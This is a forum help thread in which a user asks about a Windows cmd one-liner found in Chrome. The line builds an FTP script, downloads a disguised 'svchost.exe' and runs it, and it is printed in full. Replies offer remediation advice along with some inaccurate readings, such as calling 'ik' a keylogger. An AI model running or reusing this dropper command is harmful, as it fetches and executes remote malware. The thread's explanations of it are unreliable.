• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

Google Chrome

Robert Munch

Robert Munch

Senior member
Can someone explain this? I found this on my home desktop computer on google chrome when I stepped away from my computer for a few hours. Was my computer hacked somehow and how could have this occurred?

systemroot%\system32\cmd.exe cmd /c echo open 127.0.0.1 21 >> ik &echo user owned suckdicky >> ik &echo binari >> ik &echo get svchost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svchost.exe &exit

No cmd box prompt occurred this was in my google chrome google search bar as a "result". I live by myself so nobody did this as a prank while I was away.
 
Last edited:
Here's a year-old thread nearly identical to yours:

http://ubuntuforums.org/archive/index.php/t-1244618.html

If it was my computer, I'd rebuild it from scratch or restore it from image backups. And I'd be sure that any remote access software was protected with a very long password, that there's a router between the Internet and the PC, and be very careful about any software that gets run or installed.

"IK" is likely a Keylogger program. It stands for "invisible keylogger". It looks like it's being used here to remotely type ftp commands.

Robert Munch said:
No cmd box prompt occurred this was in my google chrome google search bar as a "result".
Click to expand...
A quick check and it seems that some commands can be run from the Chrome address bar. I don't know how extensive this is or if other browsers can do this.
 
Last edited:
From what I understand it seems the invader tried to delete my svchost.exe as it was referencing 127.0.0.1 21. I was also DMZ'd during this time with TightVNC running. When I relaunched VNC I noticed the admin password was removed including the login password to access the machine. Some sort of brute force attack maybe.

I'm not sure if infact this file is removed and i'm running on Win7 if that makes a difference. I tried to check the vncviewer.log and noticed it was at 0kb with it enabled. I've had it running for the past few days. I'm not sure how to locate an IP address from this attack.

Found another interesting article http://www.hellboundhackers.org/forum/a_bothuman_tryed_connecting_to_my_vncserver-14-11285_0.html regarding these types of attacks.
 
Last edited:
You must log in or register to reply here.

TRENDING THREADS

Back
Top